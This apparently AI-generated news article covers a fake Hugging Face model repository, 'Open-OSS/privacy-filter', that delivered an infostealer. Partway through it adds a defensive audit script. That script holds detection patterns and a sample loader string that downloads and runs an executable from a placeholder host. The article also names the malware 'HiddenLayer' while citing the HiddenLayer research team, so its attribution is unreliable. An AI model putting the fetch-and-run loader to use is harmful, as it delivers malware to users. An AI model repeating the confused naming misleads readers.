Ethical Hacking News
A new supply chain attack has emerged, using a malicious Hugging Face repository to distribute a Rust-based information stealer called HiddenLayer. The project impersonated OpenAI's Privacy Filter open-weight model, copying its description verbatim and shipping a loader.py file that fetches and executes infostealer malware on Windows machines. This attack highlights the need for better security measures in place for open-source projects and serves as a wake-up call for developers and users to prioritize authenticity and protect sensitive information.
The Hugging Face repository "Open-OSS/privacy-filter" is part of a malicious campaign dubbed "HiddenLayer." HiddenLayer is a Rust-based information stealer that exploits trust in open-source projects to gain access to sensitive information. Users were tricked into downloading the malicious project, which allowed attackers to bypass security measures and expose sensitive information. Six more repositories have been found with similar malware loaders, suggesting a broader supply chain operation. The attack also uses ValleyRAT, a modular remote access trojan distributed via phishing emails and SEO poisoning. Developers and users are advised to exercise extreme caution when interacting with open-source projects and to verify their authenticity before use.
The cybersecurity landscape has witnessed numerous attacks in recent times, but a new threat has emerged that is causing significant concern. A malicious Hugging Face repository, masquerading as an open-source project, has reached the platform's trending list by impersonating OpenAI's Privacy Filter open-weight model. This attack, dubbed "HiddenLayer" and hosted under the repository name "Open-OSS/privacy-filter," has already garnered significant attention due to its sophisticated nature and potential for widespread impact.
According to recent reports, HiddenLayer is a Rust-based information stealer that was distributed through a malicious Hugging Face repository. The project, which was named Open-OSS/privacy-filter, copied the entire description verbatim from OpenAI's legitimate Privacy Filter release and shipped a loader.py file that fetches and executes infostealer malware on Windows machines. This attack exploits the trust that users place in open-source projects, allowing attackers to gain access to sensitive information without being detected.
The malicious project instructs users to clone the repository and run a batch script ("start.bat") for Windows or a Python script ("loader.py") for Linux or macOS systems to configure all necessary dependencies and start the model. This allows the attackers to bypass traditional security measures, such as antivirus software and firewalls, and gain access to sensitive information.
The impact of this attack cannot be overstated. According to the HiddenLayer Research Team, the malicious project reached the #1 trending position on Hugging Face with approximately 244,000 downloads and 667 likes within 18 hours. This indicates that a significant number of users have been tricked into downloading the malicious project, potentially exposing their sensitive information.
Furthermore, recent analysis has uncovered six more repositories that feature a similar Python loader to deploy the stealer: anthfu/Bonsai-8B-gguf, anthfu/Qwen3.6-35B-A3B-APEX-GGUF, anthfu/DeepSeek-V4-Pro, anthfu/Qwopus-GLM-18B-Merged-GGUF, anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF, and anthfu/supergemma4-26b-uncensored-gguf-v2. These repositories are suspected to be part of a broader supply chain operation targeting open-source ecosystems.
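As an added example, not code from the article or from HiddenLayer, here is a small Python audit a defender could run over a freshly cloned model repository before executing anything in it: it flags the repository ids listed above, the loader.py/start.bat entry points the project asks users to run, and any script that both fetches remote content and launches it. The fetch/launch patterns and the constructed sample loader are assumptions.

```python
# Added example, not code from the article or HiddenLayer: audit a local clone of a model
# repo for the pattern above (a model card plus a loader that fetches and runs code).
import re
import tempfile
from pathlib import Path
# Repository ids the article names as carrying the malicious loader.
KNOWN_BAD_REPOS = {
    "Open-OSS/privacy-filter",
    "anthfu/Bonsai-8B-gguf",
    "anthfu/Qwen3.6-35B-A3B-APEX-GGUF",
    "anthfu/DeepSeek-V4-Pro",
    "anthfu/Qwopus-GLM-18B-Merged-GGUF",
    "anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF",
    "anthfu/supergemma4-26b-uncensored-gguf-v2",
}
# Entry points the malicious project tells users to run; model weights never need them.
LOADER_FILES = {"loader.py", "start.bat"}
# A script that both fetches remote content and launches something is the signal (assumed heuristic).
FETCH = re.compile(r"urllib\.request|requests\.get|urlretrieve|\bcurl\b|Invoke-WebRequest|bitsadmin", re.I)
EXEC = re.compile(r"\bexec\(|subprocess\.|os\.system|os\.startfile|powershell|cmd\s*/c", re.I)

def audit_repo(repo_id: str, repo_dir: Path) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    findings = []
    if repo_id in KNOWN_BAD_REPOS:
        findings.append(f"{repo_id} is on the published list of repositories shipping the loader")
    for path in sorted(repo_dir.rglob("*")):
        if not path.is_file():
            continue
        if path.name.lower() in LOADER_FILES:
            findings.append(f"executable entry point shipped with the model: {path.name}")
        if path.suffix.lower() in {".py", ".bat", ".ps1", ".sh"}:
            text = path.read_text(errors="ignore")
            if FETCH.search(text) and EXEC.search(text):
                findings.append(f"{path.name} both downloads and executes content")
    return findings

# Constructed stand-in for loader.py (only stored as text, never executed): fetch a binary, run it.
SAMPLE_LOADER = (
    "import urllib.request, subprocess\n"
    "urllib.request.urlretrieve('http://example.invalid/helper.exe', 'helper.exe')\n"
    "subprocess.Popen(['helper.exe'])\n"
)
def demo() -> list[str]:
    # Build a throwaway clone with a benign README and the sample loader, then audit it.
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp)
        (repo / "README.md").write_text("# Privacy Filter\nCopied model card text.\n")
        (repo / "loader.py").write_text(SAMPLE_LOADER)
        return audit_repo("Open-OSS/privacy-filter", repo)
```

The README produces no finding; the three findings all come from the repository id and the loader script.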
The use of ValleyRAT, a modular remote access trojan that's known to be distributed via phishing emails and search engine optimization (SEO) poisoning, adds another layer of complexity to this attack. According to HiddenLayer, the shared infrastructure suggests these campaigns are possibly linked and likely part of a broader supply chain operation targeting open-source ecosystems.
In light of this new threat, it is essential for developers and users to exercise extreme caution when interacting with open-source projects. Attackers have become increasingly sophisticated in their tactics, making it challenging to distinguish between legitimate and malicious projects. Therefore, it is crucial to verify the authenticity of any project before downloading or using it.
Furthermore, the incident highlights the need for better security measures in place for open-source projects. Hugging Face has since disabled access to the malicious repository, but the damage has already been done. The attack serves as a wake-up call for developers and users alike, emphasizing the importance of staying vigilant and protecting sensitive information from falling into the wrong hands.
In conclusion, the rise of HiddenLayer and Open-OSS/privacy-filter represents a new supply chain attack that has significant implications for the cybersecurity landscape. As open-source projects continue to grow in popularity, it is essential to prioritize security and authenticity to prevent similar attacks in the future.
Related Information:
https://www.ethicalhackingnews.com/articles/A-New-Supply-Chain-Attack-Emerges-The-Rise-of-HiddenLayer-and-Open-OSSprivacy-filter-ehn.shtml
https://thehackernews.com/2026/05/fake-openai-privacy-filter-repo-hits-1.html
https://huggingface.co/mudler/Qwen3.6-35B-A3B-Claude-4.7-Opus-Reasoning-Distilled-APEX-GGUF
https://simonwillison.net/2026/Apr/16/qwen-beats-opus/
https://huggingface.co/anthfu/supergemma4-26b-uncensored-gguf-v2
Published: Mon May 11 04:25:43 2026 by llama3.2 3B Q4_K_M